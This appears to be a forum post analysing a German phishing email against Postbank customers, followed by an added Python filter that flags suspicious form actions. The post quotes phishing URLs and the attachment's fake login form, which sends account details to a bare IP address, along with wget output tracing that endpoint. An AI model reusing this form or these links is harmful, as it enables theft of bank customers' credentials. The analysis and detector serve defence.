that Firefox addon Simple Mail fetched from my remote inbox.
It is written in almost the worst German.
I get such fraud mails approx. once a week with only one or two spelling or grammar errors
with an already dead link to somewhere
http://coomar.milchs.org/KhaaPjMSgcRLYz ... IWFAc.html
and here is a (still valid) one:
http://babilon.arptoday.org/wWMrsTng/ym ... 2poVk.html
But this one has a tan.html attachment with the following lines:
[ .. ]
Code:
<div id="main"><div id="main-cn"><div id="nav"><div id="nav-cn">
<a href="#content" class="skip">Navigation berspringen</a>
<div id="nav-global" class="nav">
<h2 class="aux">Navigation</h2>
<ul><li class="ng-account-overview">
<a href="?wicket:bookmarkablePage=:de.postbank.ucp.application.rai.fs.kontenuebersicht.FinanzstatusPage" class="state-current">Kontenbersicht</a></li></ul></div></div></div>
<form action="http://163.17.12.7/postdone.php" method="post" name="form" id="form">
<div id="content">
<div id="content-cn">
<div id="div9">
<div id="div" class="tpl-05">
<div id="div2">
<div id="div3">
<div id="div4">
<div id="div5">
<div id="div6">
<div id="content-bd">
<div class="tab-panel-bd">
<div id="id3d7">
<div class="form frm-western-union">
<div>
<div class="frm-freigeben control-step" id="id45a">
<div id="id460">
<div class="form-ft ft-legitimacy">
<fieldset>
<div class="legend"><h3>Postbank Online-Banking - Willkommen</h3></div>
<div class="legitimacy">
<div class="legitimacy-cn">
<div class="legitimacy-hd"></div>
<div id="id464">
<div class="inputBlock">
<div id="id46d">
<div class="legitimacy-bd" id="id478">
<p><strong>Bitte lesen Sie sorgfältig und füllen Sie alle Schritte in Form aufgeführt, so können wir erfolgreich überprüfen Sie Ihr Profil.</strong></p>
<div class="field fld-text fld-mobile-tan" id="id479">
<div class="field-cn" id="id492">
<div class="field-bd"> <span class="field-group"> <span class="field-label">
<label for="mobile-tan"> <b>Kontonummer:</b> </label>
</span></span></div>
[ .. ]
<wicket:container id="id46e" style="display:none"></wicket:container>
</div>
</div>
</div></div></div></div></div></div></div></div></div></div></div></div></div></form>
Code:
bash-3.00# wget http://163.17.12.7/postdone.php
--16:41:26-- http://163.17.12.7/postdone.php
=> `postdone.php'
Connecting to 163.17.12.7:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: https://postbank.de [following]
--16:41:28-- https://postbank.de/
=> `index.html'
Resolving postbank.de... 160.83.4.4
Connecting to postbank.de|160.83.4.4|:443... connected.
ERROR: Certificate verification error for postbank.de: unable to get local issuer certificate
To connect to postbank.de insecurely, use `--no-check-certificate'.
Unable to establish SSL connection.
bash-3.00# wget --no-check-certificate http://163.17.12.7/postdone.php
--16:41:50-- http://163.17.12.7/postdone.php
=> `postdone.php'
Connecting to 163.17.12.7:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: https://postbank.de [following]
--16:41:51-- https://postbank.de/
=> `index.html'
Resolving postbank.de... 160.83.4.4
Connecting to postbank.de|160.83.4.4|:443... connected.
WARNING: Certificate verification error for postbank.de: unable to get local issuer certificate
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://www.postbank.de/ [following]
--16:41:53-- https://www.postbank.de/
=> `index.html'
Resolving www.postbank.de... 160.83.4.4
Connecting to www.postbank.de|160.83.4.4|:443... connected.
WARNING: Certificate verification error for www.postbank.de: unable to get local issuer certificate
WARNING: certificate common name `postbank.de' doesn't match requested host name `www.postbank.de'.
HTTP request sent, awaiting response... 200 OK
Length: 103,127 (101K) [text/html]
100%[====================================>] 103,127 170.98K/s
16:41:54 (170.60 KB/s) - `index.html' saved [103127/103127]
bash-3.00#
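
An added example, not part of the original post: a mail-filter style check that parses an HTML attachment and flags any form posting to a bare IP address, over plain HTTP, or outside the domain the page claims to belong to, which is the pattern visible in tan.html above. The function names and the `expected_domain` parameter are assumptions made for this illustration; the sample is a reduced copy of the form line quoted in the post.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormActionCollector(HTMLParser):
    """Collect the action URL of every <form> start tag."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def audit_form_actions(html, expected_domain):
    """Return (action, reasons) for each form that posts somewhere suspicious."""
    collector = FormActionCollector()
    collector.feed(html)
    findings = []
    for action in collector.actions:
        url = urlparse(action)
        host = url.hostname or ""
        if not host:
            continue  # relative action: no external endpoint to judge
        reasons = []
        if url.scheme != "https":
            reasons.append("credentials sent without TLS")
        if is_ip_literal(host):
            reasons.append("action host is a bare IP address")
        elif host != expected_domain and not host.endswith("." + expected_domain):
            reasons.append("action host is outside " + expected_domain)
        if reasons:
            findings.append((action, reasons))
    return findings


# Reduced from the tan.html attachment quoted in the post.
SAMPLE = ('<div id="main"><form action="http://163.17.12.7/postdone.php" '
          'method="post" name="form" id="form"><b>Kontonummer:</b></form></div>')

if __name__ == "__main__":
    for action, reasons in audit_form_actions(SAMPLE, "postbank.de"):
        print(action, "->", "; ".join(reasons))
```

The check only inspects the attachment itself, so the 302 redirect to the real bank site seen in the wget output does not hide the collecting endpoint from it.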